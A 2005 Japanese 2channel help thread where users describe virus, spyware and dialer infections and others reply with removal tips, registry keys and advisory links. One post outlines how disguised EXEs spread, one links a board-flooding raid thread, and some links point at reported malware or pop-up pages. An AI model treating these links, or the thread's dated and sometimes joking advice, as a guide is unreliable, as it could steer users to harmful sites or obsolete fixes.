【ちゃんとUpdateしてるか】たぶんしてるかと…。
【スキャンした結果（ウイルス名・発見場所）】スキャンしても出てきませんでした。
【別のオンラインスキャンしたならその結果は】ごめんなさい、わかりません。

【症状を具体的に、分かる限りすべて書く】
ポップアップでウィンドが出てくる。頻度は1日に一度くらい(？)です。
googleツールバーなどで外部からのポップアップブロックはオンにしているので、
もしかしたら内部からの操作なのかなと。。。
【何をしたらそんなことになったのか】
海外のサイトで洋楽をググッて、出てきたページにmp3ダウンロードと書いてあったので
喜んでそのボタンを押したら、いやにダウンロードに時間がかかるので途中で停止しました。
たしかページにはXP2がどうたらといろいろ書いてありました。
その日から突然「yoursitebar」というツールバーが、yahooやgoogleのツールバーの
横並びに出来ていて、また見知らぬ"お気に入り"が４つほど追加されていて、
"すべてのプログラム"をみたらyoursitebarのフォルダが追加してありました。

【これまでにとった措置】
上記のものは削除しました。
ノートンでローカルディスク（cドライブ）をスキャンし、
スパイウェアブラスターとスパイボットとアドアウェアを更新してチェック
しましたが、ポップアップは収まってくれません。
【その他の質問】
なんでも結構ですのでアドバイスやヒントをいただけたら幸いです！お願いします！
568 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/17(日) 20:16:48 ]: >>566
そうか？３年くらいじゃぜんぜん使えないって奴も結構いそうだが
569 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/17(日) 20:38:28 ]: >>567
ご参考までに
PestPatrolのYourSiteBarの解説（英語のみ）
ttp://www3.ca.com/securityadvisor/pest/pest.aspx?id=453093992
570 名前：567 [2005/04/17(日) 21:00:41 ]: >>569
ありがとうございます、早速翻訳してみました！
…なかなか理解するのがが難しいです。。
やはりyouesitebarだけ取り除いてもダメっぽいですね。
571 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/17(日) 21:43:29 ]: >>570
翻訳すると返ってわからなくなるような・・・
Regsvr32とかRegEditでググると吉。
572 名前：567 [2005/04/17(日) 22:07:08 ]: >>571
アドバイスありがとうございます！！
573 名前：567 [2005/04/17(日) 22:41:18 ]: RegEditとRegsvr32をググッて調べて、
RegEditで対象を削除するまでは出来ました！

ただRegsvr32でのコマンドプロンプトの操作が全然わかりません。
この黒い幕は何？…って感じです。はぁ。。

ここまで出来たからってあとはほっといたら
良くないですよね｡･ﾟ･(ﾉД`)･ﾟ･｡
もうちょっと勉強してきます。
574 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/17(日) 22:47:51 ]: >>573
ほれ。
ttp://home.att.ne.jp/banana/akatsuki/soft/guiregsvr/
575 名前：567 [2005/04/17(日) 23:25:26 ]: >>574
何から何までほんとにありがとうございます！
ダウンロードして使って(?)みました。
でも使い方あってたのかな…。。。

>>569で教えていただいた
ttp://www3.ca.com/securityadvisor/pest/pest.aspx?id=453093992
と
ttp://silverstyle.ld.infoseek.co.jp/sample/sample.html
ここを参考にしましたが、違ってたっぽいです。。

タイミング良くたった今ポップアップが出てきたし。｡
ttp://66.230.146.2/sms_universe/sms-bm-intl6.html
↑こいつです…憎い･ﾟ･(ﾉД`)･ﾟ･｡

諦めずにもうちょっと研究してみます！
576 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/18(月) 00:45:44 ]: >>575
あー、海外のお友達も苦労しているようだ。

↓ここ行って、やることやって、最終的にHijackThis（行けばわかる）とかのログを掲示板で診断してもらって。

スパイウェア除去ウィザード－順を追って作業を行うことで問題解決（たぶん）
ttp://www.higaitaisaku.com/removewz01.html
577 名前：567 [2005/04/18(月) 00:57:58 ]: >>573
ここはみなさん親切な方ばかりですね｡･ﾟ･(ﾉ∀`)･ﾟ･｡
こちらもぜひ参考にさせていただきます。

今日は情報処理試験受けてきたばかりで
眠くて死にそうなのでもう寝ますが、
結果は明日必ず報告させていただきます。

どうもありがとうございました！！
578 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/18(月) 01:49:21 ]: 使用OS】 windows XP
【WindowsUpdateしてるか】してる
【AntiVirusは何を使っているか】no use
【ちゃんとUpdateしてるか】
【スキャンした結果（ウイルス名・発見場所）】 Cドライブ　プログラムファイル　system32ホルダー内
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】起動しない（永遠と再起動）、セーフモード無効、CDを受け付けない
【何をしたらそんなことになったのか】ネタバレの漫画をノートン先生の指示を仰がずに開いてから
【これまでにとった措置】 1週間前より上記の症状が起きヤマダ電機に修理に出したけどお手上げだったらしく昨日回収してきました
【その他の質問】修理が不可能な場合
ハードディスクの中身を他のPCを利用して直接CDに移す事はできるのでしょうか？
PC初心者なので訳の分からない発言もあると思うのですがヨロシクお願いします
579 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/18(月) 01:55:35 ]: >>578
検出されたウィルスは何？
580 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/18(月) 04:10:03 ]: 【使用OS】XP
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】ノートン
【ちゃんとUpdateしてるか】している
【スキャンした結果（ウイルス名・発見場所）】できない
【別のオンラインスキャンしたならその結果は】できない
【症状を具体的に、分かる限りすべて書く】
PC起動後、強制的になにかの窓（IEではない）が大量に開き
なにもできなくなる。所々にでかいゴキブリやハエみたいのも動き回る
【何をしたらそんなことになったのか】nyで落としたファイルのなにかだと思います。
【これまでにとった措置】なにもできません。
【その他の質問】対処方法などを教えてください。
再インストールしかないのでしょうか？
581 名前：嬲 [2005/04/18(月) 08:00:16 ]: キャリア関係ない携帯用ｳｲﾙｽって有りますか？店長。
582 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/18(月) 08:49:17 ]: >>580
この板のローカルルールを嫁
583 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/18(月) 09:14:20 ]: >>579

店員の話だとツイスターというウィルスらしいです
584 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/18(月) 12:59:11 ]: 【使用OS】ＸＰ
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】バスター2005
【ちゃんとUpdateしてるか】している
【スキャンした結果（ウイルス名・発見場所）】ＤＩＡＬ_ＰＯＲＮＤＩＡＬ.ＤＸ
【別のオンラインスキャンしたならその結果は】していない
【症状を具体的に、分かる限りすべて書く】アクセス拒否（手動処理が必要です）と出ます。
【何をしたらそんなことになったのか】わかりません。
【これまでにとった措置】　一時ファイル削除　Ｃｏｏｋｉｅ削除
【その他の質問】
調べてみてもどうしていいのかわかりません。よろしくお願いします。
585 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/18(月) 13:13:18 ]: >>584
ウイルスではないね。ファイル名とそれがある場所を書いて。
586 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/18(月) 13:22:28 ]: >>584
おそらくこれ
ttp://www.higaitaisaku.com/database/database.cgi?cmd=dp&num=177
587 名前：名無しさん＠お腹いっぱい。 [2005/04/18(月) 13:26:43 ]: ウィルスじゃなくてトロイだな
588 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/18(月) 13:46:06 ]: >>584
簡単に説明するとこうなる。
検出したファイルパスをメモ
タスクマネージャでウイルスのプロセスを終了させる
レジストリエディタを使い次のキーを削除する
HKEY_CURRENT_USER\Software\WebSiteViewer
レジストリエディタを閉じる
フォルダーやファイルを検索し"WebSiteViewer"" XXX.lnk"" sex.lnk"を削除
システムの復元を無効にしてバスターで検索しDIAL_PORNDIAL.DXとして検出された
フォルダとファイルを削除

ウイルス検索でDIAL_PORNDIAL.DXを発見したのか？
トレンドの説明だとスパイウェア検索で検出すると書いてあるが…
589 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/18(月) 14:58:55 ]: >585-588
どうもありがとうございました。
ファイル名はC:\System Volume Information￥_restor.exe
ウイルスのリアルタイム検索で出ました。
590 名前：名無しさん＠お腹いっぱい。 [2005/04/18(月) 16:36:55 ]: msxslabってファイルがウイルスに感染してるんですけど、これって削除してもいいファイルでしょうか？
591 名前：567 [2005/04/18(月) 18:44:51 ]: 昨日の続きの報告です。
>>576で教えていただいたサイトを参考して、
キャッシュとクッキーと履歴を綺麗さっぱりさせました。

暫らく様子を見てまだポップアップが出るようであれば
次の段階に進みたいと思います(´ー｀)
592 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/18(月) 18:52:30 ]: >>590
translate.google.com/translate?hl=ja&sl=en&u=http://www.spyany.com/files/Msxslab_dll.html&prev=/search%3Fq%3Dmsxslab.dll%26hl%3Dja%26lr%3D%26ie%3DUTF-8%26inlang%3Dja%26sa%3DG
593 名前：名無しさん＠お腹いっぱい。 [2005/04/18(月) 19:56:35 ]: >>592
ありがとう。でもいまいちよくわからない。削除っていいのかな？
594 名前：名無しさん＠お腹いっぱい。 [2005/04/18(月) 22:49:15 ]: ウイルスではなくて、いわゆるワンクリック詐欺だと思うんだけど
気にせずつっぱしてたら、なんと一週間後にメールが届いてきた上に
ウザいポップアップがひっきりなしにでてきます。。。
内容は『警告！一週間過ぎたから金払え！』って感じなんだけど
どうやったら出ないようにできますか？

ちなみに今はセーフモードでつないでいます。
595 名前：名無しさん＠お腹いっぱい。 [2005/04/18(月) 23:05:42 ]: 助けてください
新種のウイルスかも

ex10.2ch.net/test/read.cgi/news4vip/1113825621/l50

キャプが10スレ目にあります
596 名前：名無しさん＠お腹いっぱい。： mailto:sage [2005/04/18(月) 23:24:06 ]: Windows98ですが、ツールバーの下に、新たに英語のツールバーが出てきて、
オンラインで検査したんですが、ウイルスは発見されませんでした。

どうやって、出てきたツールバーを消す事が出来るのでしょうか？
597 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/18(月) 23:25:09 ]: すみません、私は全くこちらの方面には疎いので
ちょっと伺いたく来ました。
実はYahooのフリーアドレスに、
私と同じアカウントを使ったhotmailアドレスからの
添付ファイルのみのメールが来ていたので調べると
Trojan.Tooso.Hというウィルスが出てきまして、
トロイの木馬？と思いましたが検索をかけても出てこないので
これがどんなものか、ご存知の方いらっしゃいましたら
教えて頂けないでしょうか。。
今までnetskyというのは大量に送られてきてたのですが
私はMacユーザーなので、開いても意味はないとの事で
暫く無視していたら、こんなものが送られてきました。
昔Windows使用時に知人にハッキングされた経験があるのですが
Macで感染する事は殆ど無いですよね？；
大変厚かましいのですが、もし可能性がありましたら
その場合の対処法等もあれば教えて頂けると大変有難いです。
宜しくお願い致します。長文失礼致しました。
598 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/18(月) 23:32:12 ]: >>594-597
>>1
情報は整理されてて正確かつ小出しにならないほうがいい。
599 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 00:33:23 ]: いちおう書いとく

>>594
とりあえずSpybotとAd-awareつかう。
それでダメならHijackThisをつかって怪しいエントリを削除するなどの作業になるな。
その際はこのサイトをを参考に↓
www.higaitaisaku.com/
メアド抜かれたようだね…自分のだけじゃなくてPCに入ってるの全部抜かれたかも。

>>595
病院へ行く

>>596
それだけじゃわからないけどスパイウェアだと思う｡SpybotとAd-aware使ってみる。

>>597
16日に発見されたばかりのセキュリティソフトウェアの操作を妨げるトロイの木馬だそうだ。
Hostsファイルも改変。
securityresponse.symantec.com/avcenter/venc/data/trojan.tooso.h.html
シマンテックは対処されてるようだね。
Macのことについてはちょっとわからないので…
600 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 07:09:28 ]: なんか怖い女の人が一瞬写るのはウィルスですか？
初めてなったのでわかりません。
601 名前：名無しさん＠お腹いっぱい。 [2005/04/19(火) 08:17:28 ]: リカバリしてPCを出荷状態に戻したのに
ウィルスが駆除されないってことはありますか？
リカバリして、ヤフーと２chぐらいしかみていないのに
W32.Wallzというウィルスが検出されます。
602 名前：名無しさん＠お腹いっぱい。 [2005/04/19(火) 09:26:27 ]: >>601
リカバリ直後は大丈夫だが、リカバリ後に
ネット接続した時に侵入される可能性は
大いにある。
603 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 09:27:10 ]: >>601
リカバリしてネットに繋ぐ前に
ファイアーウォールとアンチウィルスソフトを入れてなければ
余裕でそういうことになる
604 名前：名無しさん＠お腹いっぱい。 [2005/04/19(火) 10:33:51 ]: >602
>603
最新のウィルスバスターを入れても
すぐ警告が出て感染してしまいます
警告→削除→警告の繰り返し・・
605 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 11:27:53 ]: >>601
駆除方法書いてあるぞ
www.symantec.com/region/jp/avcenter/venc/data/jp-w32.wallz.html
606 名前：ハッセルバインク ◆WwWWWWWWGw mailto:sage [2005/04/19(火) 11:58:15 BE:175524697- ]: >>604
バスター入れてから最新の状態にアップデートするまでが危険だよ。

つまり予めパッチを落としてCD焼くなり
リカバリで消えないところに移してからリカバリして
バスターの前にパッチを当てろということですよ。

ではがんばってやり直してください。

以下非常に重要なセキュリティパッチね。
ttp://www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx
ttp://www.microsoft.com/japan/technet/security/bulletin/MS04-012.mspx
607 名前：名無しさん＠お腹いっぱい。 [2005/04/19(火) 12:08:39 ]: 某サイトを見ていたら何も触れていないのに、コピーベーストで
文字を青くされました。

これはいったい何なのでしょうか？
どうかお願いいたします。＞＜
608 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 13:03:56 ]: >>607
マルチすると答えてくんねーぞ
609 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 13:06:57 ]: >>607
blue tory　で検索してみな
610 名前：名無しさん＠お腹いっぱい。 [2005/04/19(火) 13:09:19 ]: 【田代砲専用】日本 2ch VS 中国 2ch 【作戦会議所】Part 20

pastorale.rdy.jp/test/read.cgi/tashiro/1113824057/
611 名前：アホ　(:D)|￣|＿ mailto:_@gao.ne.jp [2005/04/19(火) 13:30:46 ]: ムラムラっとしてエロファイル落としたら踏んでしまった(:D)|￣|＿

はやる気持ちを押さえきれなかった
今は反省している
612 名前：名無しさん＠お腹いっぱい。 [2005/04/19(火) 14:59:32 ]: 使用ＯＳ　ウインドウズ９８
ｗＩをしてるか　緊急時だけしている
Ａｎは何を使っているか　ノートン２００４（期限切れ）
スキャンした結果　今のとこやっていない
他でオンラインスキャンしたか　シマンテックの無料スキャンやりました。
症状　オンラインスキャンでＶＢＳＬとＵＳ（途中までしかわからずごめん）
というウイルスがみつかりました。
削除方法はどうしたらいいのでしょうか。
613 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 15:05:08 ]: >>611
村々＞得ろ踏む＞反省＞学習＞村々・・・
614 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 15:23:03 ]: >>612
もう一回スキャンすれば？
615 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 15:23:18 ]: >>612
＞スキャンした結果　今のとこやっていない

意味がわからん
なんでもってんの使わないのだ
616 名前：名無しさん＠お腹いっぱい。 [2005/04/19(火) 16:22:57 ]: 山田ウイルスにノートンは対応してますか？
617 名前：名無しさん＠お腹いっぱい。 [2005/04/19(火) 16:28:47 ]: >>615
３月３１日で期限切れているけどスキャンはできるの？
618 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 16:46:47 ]: >>612
スキャンはできるけど最新のウィルス定義じゃないからあんま意味ないな
シマンテックでもう1回スキャンして検出されたウィルス名をハッキリさせるのが第一。
それがわかったらまた来い。
619 名前：名無しさん＠お腹いっぱい。 [2005/04/19(火) 18:03:27 ]: ノートンでｖｂｓ・ｌｏｖｅｌｅｔｔｅｒ．ｖａｒ検出と警告されてしまいました。。。。
期限切れなので、最新版を購入しないとウィルス定義新しくないので、何もできなっいってことですか？
620 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 18:30:32 ]: >>619
ttp://www.symantec.com/region/jp/sarcj/data/v/fix.vbs.loveletter.html

こちらからどうぞ。
621 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 19:17:52 ]: >>619
>>620のリンク先を読んだらついでに>>1も見直して来い
話はそれからだ
622 名前：617 [2005/04/19(火) 19:31:24 ]: >>618
ただいまノートンでのスキャン終わりました。（ちなみにウイルス定義は
４月１６日になっていた。
結果
なんのウイルスも検出しませんでした。
お騒がせしてごめん。
623 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 19:33:51 ]: 619
はい？検出されたって事はウイルス定義が対応してるってことだろ？
あと、らぶれた～varは雑魚だから大丈夫。
624 名前：名無しさん＠お腹いっぱい。 [2005/04/19(火) 19:36:43 ]: ＞＞６２０
ｄｏｃｕｍｅｎｎｔｓ　ａｎｄ　ｓｅｔｔｉｎｇｓがやられたってことはリカバリしかないってこと

？　絶望的になってきた。
625 名前：名無しさん＠お腹いっぱい。 [2005/04/19(火) 19:39:24 ]: ＞＞６２３
ほんと？
他の掲示板ですごい脅されたんだけど。
検出されたってあって、ファイル修復できずってかいてるんだけど。。。
626 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 19:39:56 ]: >619と>620のウイルスは別物だろ。
627 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 19:41:29 ]: >625
あのね、定義が対応してても修復出来ないウイルスは沢山あるんだよ。
628 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 19:43:58 ]: >>625
> 他の掲示板ですごい脅されたんだけど。

……
629 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 19:45:59 ]: >>626
ttp://www.symantec.com/region/jp/avcenter/venc/data/vbs.bryon@mm.html
こっち？
630 名前：名無しさん＠お腹いっぱい。 [2005/04/19(火) 19:46:02 ]: だからりかばりしかないのかよ～
631 名前：名無しさん＠お腹いっぱい。 [2005/04/19(火) 19:47:52 ]: アドウェアでウイルススキャンしたら

@valueclick.ne.jp

というのが発見された。

バリュークリックジャパンの作ったウイルスですか？
私はこんなワームをキャッシュにいれていいとは承諾してませんが
損害賠償請求できますか？

それともスパイウェアをつくるのがこの会社の仕事ですか？
勝手に他人の電子記録を改ざんするのは犯罪ではないですか？

バリュークリックジャパンは犯罪会社ですか？
632 名前：名無しさん＠お腹いっぱい。 [2005/04/19(火) 19:51:01 ]: ウイルスをナメて掲示板に書き込み
↓
ウイルスは怖いんだぞ～と脅かされビビる
↓
２ちゃんで大したことないよとレスをもらう
↓
ひと安心してため息をつく
↓
一転２ちゃんで総叩きに遭い泣きながらリカバリする
↓
また感染（以下ループ
633 名前：名無しさん＠お腹いっぱい。 [2005/04/19(火) 20:00:09 ]: OS:WindowsXP HOME
WINDOWS/SYSYTEM32/EIxplore.exe

ウィルスのようなのですが、どのようなウィルスなのかご存じの方おりますか？
634 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 20:05:08 ]: >>631
市況板から出張せんでもええがなｗ
635 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 20:46:49 ]: winnyのキンタマウィルス等はノートン先生で検出できるのでしょうか？
636 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 20:50:01 ]: >>635
検出できるものもあれば未対応のもある。
637 名前：名無しさん＠お腹いっぱい。 [2005/04/19(火) 21:02:09 ]: 期限切れのノートンが２ちゃんの某実況スレで過激に反応する。
どうしたらいいんだろうか。
638 名前： mailto:_@ngwtky.nichia.co.jp [2005/04/19(火) 21:18:14 ]: >>637

諦める。
639 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 21:18:31 ]: 1.気にしない
2.先生をアンインスコする
3.そのスレに行かない
640 名前：参考 mailto:_@tigers-net.com [2005/04/19(火) 21:23:56 ]: pc8.2ch.net/test/read.cgi/sec/1111407467/
641 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 21:24:04 ]: >>7嫁>>7嫁>>7嫁>>7嫁>>7嫁
>>7嫁>>7嫁>>7嫁>>7嫁>>7嫁
642 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 21:26:03 ]: >>637
ノートン使ってないから分からんが、
ピンポイントでファイル指定とかフォルダ指定とかして
常駐チェック対象から除外する設定って出来ないのか？
643 名前：名無しさん＠お腹いっぱい。 [2005/04/19(火) 22:13:19 ]: antinny.afに感染したみたいなんだけど、また何処のソフトも対応していないのかな？
削除出来ないんだけど・・・
どうやって削除するの？
644 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 22:19:14 ]: >>643
NOD32が対応してるようだぞ。
645 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/19(火) 22:37:21 ]: アンチウィルス期限切れにも優しいんだな・・・表面上はｗ
646 名前：参考 mailto:_@gao.ne.jp [2005/04/19(火) 22:43:39 ]: 訂正

tmp4.2ch.net/test/read.cgi/download/1113652734/
647 名前：名無しさん＠お腹いっぱい。 [2005/04/19(火) 23:17:24 ]: tp://model-rich.net/photo/oneeeeeeeeeesan/data/74213.jpg
↑某実況スレで山田ウィルスと指摘されました
ギコナビのサムネイルでみたのですが感染しますでしょうか？

【使用OS】 XP
【WindowsUpdateしてるか】おとといしました
【AntiVirusは何を使っているか】ウィルスバスター2005
【ちゃんとUpdateしてるか】最新版です
【スキャンした結果（ウイルス名・発見場所）】まだしていません
【別のオンラインスキャンしたならその結果は】まだしていません
【症状を具体的に、分かる限りすべて書く】バスター反応しまんでした
【何をしたらそんなことになったのか】まだ何も…
【これまでにとった措置】感染したか分からないのでまだなにも
【その他の質問】どなたか教えてください！
648 名前：名無しさん＠お腹いっぱい。 [2005/04/19(火) 23:29:20 ]: 久しぶりにルータのログ見たら同じISPノードから
TCP445&135に多くの来訪があるんだが、何か流行ってたの？
649 名前：名無しさん＠お腹いっぱい。 mailto:ｷﾞｺﾅﾋﾞ使いsage [2005/04/19(火) 23:36:21 ]: >>647
しません。

つーか、なにやｯトンじゃコイツラ('Ａ`)
650 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 00:27:32 ]: >>648
今ごろ何時代遅れな事言っているんだ？
お前その久しぶりって、ほんとうは数年ぶりだろ？
651 名前：上島龍平 mailto:_@dmz-mail.city.fuji.shizuoka.jp [2005/04/20(水) 01:08:08 ]: 　　　○　　　○　＜押すなよ！絶対に押すなよ！
　　　|こ　／ |
　　　 >ヽ　|⌒ 新しいフォルダ　　　　　　　　　　　　　　　　　　　　　　　　　　.exe
652 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 01:30:34 ]: ファイルからメェディアプレイヤー開いたらライセンス取得とか英文出たんだけどこれってまずい？
653 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 06:54:20 ]: ああ、まずいまずい。OS再インスコしな。
654 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 09:24:48 ]: >>653
レスありがとうございます。OSを再ｲﾝｽｺする知識がないので。他に対処方法はないのでしょうか？いろいろググって調べてみたのですがライセンスを取ってしまうと具体的にどうなるんですか？初心者ですみません
655 名前：名無しさん＠お腹いっぱい。 [2005/04/20(水) 12:48:56 ]: To: ここが自分のメールアドレスじゃない
Subject: メールリストから外してください

　　とにかくメーリングリストから外してください。
　おかげで迷惑メールがきて困っています。

　しかもウィルスメールでリストを流出させて
　しまって反省の色はないんですか？
　冗談じゃないよ！

みたいなメールが何件か着てます。自分は何も送信してないのですが。
ウイルスバスターで検索してもなにも発見されないし。
どうしたらよろしいでしょうか？
656 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 12:58:16 ]: >>652
まずメッセージを自分で訳して判断しろ。話はそれからだ。
657 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 13:00:20 ]: >>655
言ってることがさっぱりわからない。

あなたはそのMLの管理者なのか、それとも単なる参加者なのか、
あるいはまったくそのMLに参加していないのかぐらい書けば?
658 名前：名無しさん＠お腹いっぱい。 [2005/04/20(水) 13:06:50 ]: 全く関係はありません。
送られてくるメールアドレスにも見覚えはありませんし。
内容的には僕がウイルスを送っていてそれに怒っているみたいです。
もちろん何も送っていないのですが。
659 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 13:11:14 ]: >>655
「みたいなメール」じゃなくて、隠したいところは＊に置き換えるとかして
コピペすりゃいいじゃん。

単にメアド詐称ウイルスに切れてるだけのDQNって可能性もあるけど、
状況の記述にまとまりがないし詳細に書いてるわけでもないから
判断しようがない。
660 名前：名無しさん＠お腹いっぱい。 [2005/04/20(水) 13:12:03 ]: ぬるぽ
661 名前：名無しさん＠お腹いっぱい。 [2005/04/20(水) 13:23:23 ]: >>656ダウンロードしたファイルをメェディアプレイヤーで再生すると下のバーのところにライセンスを取得しますと文字が出て保護された情報らしく英語のサイトにつながれ意味もわからず閉じるとこの情報を記録しますかってなりました。説明へたでごめん
662 名前：名無しさん＠お腹いっぱい。 [2005/04/20(水) 13:48:29 ]: >>655
From: **** [mailto:*******@**.*****.or.jp]
Sent: Wednesday, April 20, 2005 7:07 AM
To: g1*******@m**i.un*******.co.jp
Subject: メールリストから外してください

＝＝メールの内容同じだから省く＝＝
ですか？？
うちにも爆弾みたいにあちこちから来てますよ。
TO.のところ、隠したけどわかるでしょ？

言っとくけど、私も被害者です。
管理者でもないし、MLに登録してるわけでもありませんよ。

↑のコピペメールの送信者は内容と件名から、MLに登録している人だと思うけど、
>>659
「単にメアド詐称ウイルスに切れてるだけのDQN」ですねえ。。。↑のメールの人はね。
自分でMLに登録したんだから、解除の方法くらい解るだろーに。

To: g1*******@m**i.un******d.co.jpがMLの代表アドレスで、MLのサーバーか管理者のパソコンがウィルス感染してるんでしょう、たぶん。
g1*******@m**i.un******d.co.jpへメールすると、あちこちに勝手にメールが送られている模様。

関係ないっぽい人からもいぱーい来てる。

g1*******@m**i.un******d.co.jpのドメイン情報調べて、ドメインをググったけど、怪しげなのがヒットするね。

わたしのアドレスもどっかで拾われたかなあ…。
うざいから続くようならメールサーバーでドメインブロックするけど、(独自ドメインのメアドに来てるから)
プロバイダメールとかでもISPに言ってドメインごとブロックしてもらえないのかな？
663 名前：名無しさん＠お腹いっぱい。 [2005/04/20(水) 13:49:40 ]: 最強の構成を教えてやる全部フリーで検出率は上回るぞ。
Avast!+ZoneAlarm+Ad-aware+Ewido+A-squared+SpywareBlaster+SecureVM
664 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 13:54:20 ]: 　　Λ＿Λ
　（　・∀・）　　|　|　ｶﾞｯ
　と　　　　）　　 |　|
　　Ｙ　/ノ　　　人
　　　 /　）　　 < 　>__Λ∩
　＿/し'　／／. Ｖ｀Д´）/ ←>>660
　（＿フ彡　　　　　　　/
665 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 13:56:54 ]: >>655
うちも全く同じのが来た
666 名前：名無しさん＠お腹いっぱい。 [2005/04/20(水) 13:59:02 ]: >>665 >>655
うちの会社の人のメールにも来た。
なんなの？
667 名前：６６６ mailto:_@gao.ne.jp [2005/04/20(水) 13:59:35 ]: 　
668 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 14:20:26 ]: そんなﾒｰﾙが流行ってんのか・・・？
かれこれ4年くらい今のｱﾄﾞﾚｽ使ってるけど迷惑ﾒｰﾙ数0.。。。
669 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 15:17:43 ]: >>668
ここに一回さらしてみ。凄い事になるから。
とんかく、HPや掲示板で一度でも晒したら、
とんでもないことになるよ。
670 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 15:48:56 ]: >>666
返信してきた時点で
宣伝やスパムメールの宛先として登録されるんと違うかな
671 名前：527 mailto:sage [2005/04/20(水) 16:11:24 ]: >>527です。
ウィルスバスターだめで、
ad-aware,spybot,ewidoもだめなんですがどうしたらいいですか？
672 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 17:12:17 ]: HijackThis
673 名前：名無しさん＠お腹いっぱい。 [2005/04/20(水) 18:18:01 ]: 欄検眼段て何経由で感染するの？
あと全部のjpgファイルが流出しちゃうの？
うｐフォルダに入るだけじゃなくて
674 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 18:23:53 ]: >>673
訊く前に（ｒｙ
ttp://internet.watch.impress.co.jp/cda/news/2005/03/23/6953.html
675 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 18:27:52 ]: >>674
文句言いながらも教えてやるお前っていい奴だな
676 名前：名無しさん＠お腹いっぱい。 [2005/04/20(水) 18:31:21 ]: >674
うんごめん書き込んだ後それ読んだんだけどさ。
基本的に持ってるファイル全てにDSCは付いてないんだけど
何経由でどうすると感染するのかわからなくてね。
あと復元箱とかだと以前に削除したのとかも大分復元できるじゃない。
そこまで深くは流出しないのかね
677 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 18:48:44 ]: >>676
経由で判明してるのは、
フォルダ偽装ＥＸＥの誤実行、ZIPファイル偽装ＥＸＥの誤実行←ファイル容量を極めて大きくしているため大きさでは判別できない。
HTMLによるインラインフレームセキュリティーホールＥＸＥ自動実行←既存のhtmlヘルプに組み込むなど、判別困難。
インストーラー偽装ＥＸＥ実行。←ゲームのインストーラーで一部発見されている。
678 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 19:07:45 ]: >>671
ココで質問してみる↓
www.higaitaisaku.com/
679 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 19:33:56 ]: g1winnersやっぱ有ったかｗ
ウチにもキレて文句言ってきてるｱﾌｫ大杉
つーか、リストから外せってのが>>670の予測と見た
